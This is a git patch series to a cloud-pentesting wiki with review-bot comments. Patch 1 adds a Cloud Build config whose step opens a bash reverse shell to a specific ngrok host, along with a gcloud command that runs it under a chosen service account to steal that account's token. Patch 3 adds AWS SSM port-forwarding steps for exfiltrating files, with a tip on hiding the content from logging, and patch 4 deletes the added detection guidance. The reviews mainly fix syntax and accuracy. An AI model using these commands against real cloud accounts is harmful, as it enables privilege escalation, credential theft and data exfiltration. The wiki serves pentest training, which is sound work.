From 65da889db0f59f4f1174443c59d448c9685f7ba8 Mon Sep 17 00:00:00 2001 From: hasshido Date: Wed, 30 Jul 2025 21:00:52 +0200 Subject: [PATCH 1/4] Update cloudbuild.builds.create exploitation method Includes direct gcloud command description to exploit this permission. --- .../gcp-cloudbuild-privesc.md | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md index c7fe2f0be..5557616d1 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md 
@@ -15,6 +15,24 @@ For more information about Cloud Build check: With this permission you can **submit a cloud build**. The cloudbuild machine will have in it’s filesystem by **default a token of the cloudbuild Service Account**: `@cloudbuild.gserviceaccount.com`. However, you can **indicate any service account inside the project** in the cloudbuild configuration.\ Therefore, you can just make the machine exfiltrate to your server the token or **get a reverse shell inside of it and get yourself the token** (the file containing the token might change). +#### Direct exploitation via gcloud CLI + +1- Create `cloudbuild.yaml` and modify with your listener data +```yaml +steps: + - name: bash + script: | + #!/usr/bin/env bash + bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14965 0>&1 +options: + logging: CLOUD_LOGGING_ONLY +``` +2- Upload a simple build with no source, the yaml file and specify the SA to use on the build: +```bash +gcloud builds submit --no-source --config="./cloudbuild.yaml" --service-account="projects//serviceAccounts/@.iam.gserviceaccount.com +``` + +#### Using python gcloud library You can find the original exploit script [**here on GitHub**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudbuild.builds.create.py) (but the location it's taking the token from didn't work for me). 
Therefore, check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/f-cloudbuild.builds.create.sh) and a python script to get a reverse shell inside the cloudbuild machine and [**steal it here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/f-cloudbuild.builds.create.py) (in the code you can find how to specify other service accounts)**.** For a more in-depth explanation, visit [https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/](https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/) From 95f380db6bc71c777dc87e8778e8d68c8f7e7cd7 Mon Sep 17 00:00:00 2001 From: hasshido Date: Wed, 30 Jul 2025 21:13:32 +0200 Subject: [PATCH 2/4] Update gcp-cloudbuild-privesc.md removing cloudbuild.builds.update ### `cloudbuild.builds.update` Currently this permission is listed as **only** usable for the API method `builds.cancel()`, which cannot be abused to change the parameters of an ongoing build. References: - https://cloud.google.com/build/docs/iam-roles-permissions#permissions - https://cloud.google.com/build/docs/api/reference/rest/v1/projects.builds/cancel --- .../gcp-privilege-escalation/gcp-cloudbuild-privesc.md | 5 ----- 1 file changed, 5 deletions(-) diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md index 5557616d1..b2d8f5443 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md 
@@ -37,11 +37,6 @@ You can find the original exploit script [**here on GitHub**](https://github.com For a more in-depth explanation, visit [https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/](https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/) -### `cloudbuild.builds.update` - -**Potentially** with this permission you will be able to **update a cloud build and just steal the service account token** like it was performed with the previous permission (but unfortunately at the time of this writing I couldn't find any way to call that API). - -TODO ### `cloudbuild.repositories.accessReadToken` From 3f16d3c5f34635c6690c9dbada793ed2c80dcf3b Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Wed, 6 Aug 2025 01:38:30 +0000 Subject: [PATCH 3/4] Add content from: How to transfer files in AWS using SSM --- .../README.md | 61 +++++++++++++++++++ 1 file changed, 61 insertions(+) diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md index bfd300c70..38406dd4b 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md 
@@ -138,6 +138,63 @@ Note that the SSL connections will fail unless you set the `--insecure-skip-tls- Finally, this technique is not specific to attacking private EKS clusters. You can set arbitrary domains and ports to pivot to any other AWS service or a custom application. +--- + +#### Quick Local ↔️ Remote Port Forward (AWS-StartPortForwardingSession) + +If you only need to forward **one TCP port from the EC2 instance to your local host** you can use the `AWS-StartPortForwardingSession` SSM document (no remote host parameter required): + +```bash +aws ssm start-session --target i-0123456789abcdef0 \ + --document-name AWS-StartPortForwardingSession \ + --parameters "portNumber"="8000","localPortNumber"="8000" \ + --region +``` + +The command establishes a bidirectional tunnel between your workstation (`localPortNumber`) and the selected port (`portNumber`) on the instance **without opening any inbound Security-Group rules**. + +Common use cases: + +* **File exfiltration** + 1. On the instance start a quick HTTP server that points to the directory you want to exfiltrate: + + ```bash + python3 -m http.server 8000 + ``` + + 2. From your workstation fetch the files through the SSM tunnel: + + ```bash + curl http://localhost:8000/loot.txt -o loot.txt + ``` + +* **Accessing internal web applications (e.g. Nessus)** + +```bash +# Forward remote Nessus port 8834 to local 8835 +aws ssm start-session --target i-0123456789abcdef0 \ + --document-name AWS-StartPortForwardingSession \ + --parameters "portNumber"="8834","localPortNumber"="8835" +# Browse to http://localhost:8835 +``` + +Tip: Compress and encrypt evidence before exfiltrating it so that CloudTrail does not log the clear-text content: + +```bash +# On the instance +7z a evidence.7z /path/to/files/* -p'Str0ngPass!' +``` + +--- + +**Defence & Detection** + +* Limit who can call `ssm:StartSession` or restrict the allowed SSM documents. 
+* Enable Session Manager logging to CloudWatch/S3 and monitor for the `AWS-StartPortForwardingSession` document. +* Use VPC endpoints plus traffic inspection to detect unexpected data egress. + + + ### Share AMI ```bash @@ -474,6 +531,10 @@ if __name__ == "__main__": main() ``` +## References + +- [Pentest Partners – How to transfer files in AWS using SSM](https://www.pentestpartners.com/security-blog/how-to-transfer-files-in-aws-using-ssm/) + {{#include ../../../../banners/hacktricks-training.md}} From f0df70528aa15024ca1294e6a5e63a863de505f9 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Mon, 18 Aug 2025 16:48:30 +0200 Subject: [PATCH 4/4] Update README.md --- .../aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md | 9 --------- 1 file changed, 9 deletions(-) diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md index 38406dd4b..7583159af 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md @@ -185,15 +185,6 @@ Tip: Compress and encrypt evidence before exfiltrating it so that CloudTrail doe 7z a evidence.7z /path/to/files/* -p'Str0ngPass!' ``` ---- - -**Defence & Detection** - -* Limit who can call `ssm:StartSession` or restrict the allowed SSM documents. -* Enable Session Manager logging to CloudWatch/S3 and monitor for the `AWS-StartPortForwardingSession` document. -* Use VPC endpoints plus traffic inspection to detect unexpected data egress. - - ### Share AMI
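Review bot: the `gcloud builds submit` line in patch 1/4 (`@@ -15,6 +15,24 @@` of gcp-cloudbuild-privesc.md) does not run as printed: `--service-account="projects//serviceAccounts/@.iam.gserviceaccount.com` opens a double quote that is never closed, and the project and service-account placeholders are empty (`projects//` and `@.iam`), so a reader who copies it gets an unterminated string and an invalid resource path. Use explicit placeholders such as `PROJECT_ID` and `SA_NAME` in the path and close the quote. In the same hunk the YAML hardcodes a specific listener (`/dev/tcp/5.tcp.eu.ngrok.io/14965`) even though step 1 tells the reader to replace it, so a neutral `ATTACKER_IP/PORT` placeholder is clearer. The `options: logging: CLOUD_LOGGING_ONLY` line is also unexplained while the paragraph above claims you can "indicate any service account inside the project" without saying what the caller needs on that account; a one-line note that Cloud Build demands a non-default logging option when a user-specified service account is set, and that the caller must be allowed to act as that service account (`iam.serviceAccounts.actAs`), would make the precondition honest. Finally, `1-`/`2-` should be a markdown ordered list (`1.`/`2.`) like the rest of the page.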
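Review bot: deleting the whole `cloudbuild.builds.update` section in patch 2/4 (`@@ -37,11 +37,6 @@`) leaves nothing on the page explaining why the permission is not listed, so the next contributor who scans the permission list will likely re-add the same "Potentially" paragraph. The commit message already holds the right justification (the permission only backs `builds.cancel()`, which cannot alter a running build) and two reference URLs; keep a one-line statement of that under the heading, with those links, instead of removing it outright. The hunk also leaves two consecutive blank lines before `### cloudbuild.repositories.accessReadToken`.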
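Review bot: in patch 3/4 (`@@ -138,6 +138,63 @@` of the EC2/EBS/SSM README) the tip "Compress and encrypt evidence before exfiltrating it so that CloudTrail does not log the clear-text content" gives a wrong reason: CloudTrail records the `ssm:StartSession` API call and its parameters, not the bytes that flow through the tunnel, so encrypting the archive changes nothing about what CloudTrail sees. If the intent is to avoid leaving readable loot on the instance or in any session logging that is enabled, say that; as written it misleads the reader about what is logged. Smaller items in the same hunk: the first command ends with `--region` and no value while the Nessus example omits `--region` entirely, so pick one form and use a visible placeholder; step 1 of "File exfiltration" says the server "points to the directory you want to exfiltrate" but `python3 -m http.server 8000` serves the current working directory, so add `--directory /path/to/loot` or a preceding `cd`; and `-p'Str0ngPass!'` puts the password on the command line, where shell history and the process list record it, which undercuts the tip's own purpose.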
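Review bot: patch 4/4 removes the entire "Defence & Detection" block that patch 3/4 added, and the commit message ("Update README.md") gives no reason. If the bullets were dropped because they do not belong on an offensive post-exploitation page, say so in the message; if they were dropped as inaccurate, note that the three bullets (restricting `ssm:StartSession` and allowed documents, Session Manager logging to CloudWatch/S3, VPC endpoints with traffic inspection) were the only defensive guidance in this subsection, and a one-line pointer to wherever that guidance now lives would be better than silent removal. The hunk also leaves the `---` rule added before `#### Quick Local ↔️ Remote Port Forward` without the closing rule it was paired with.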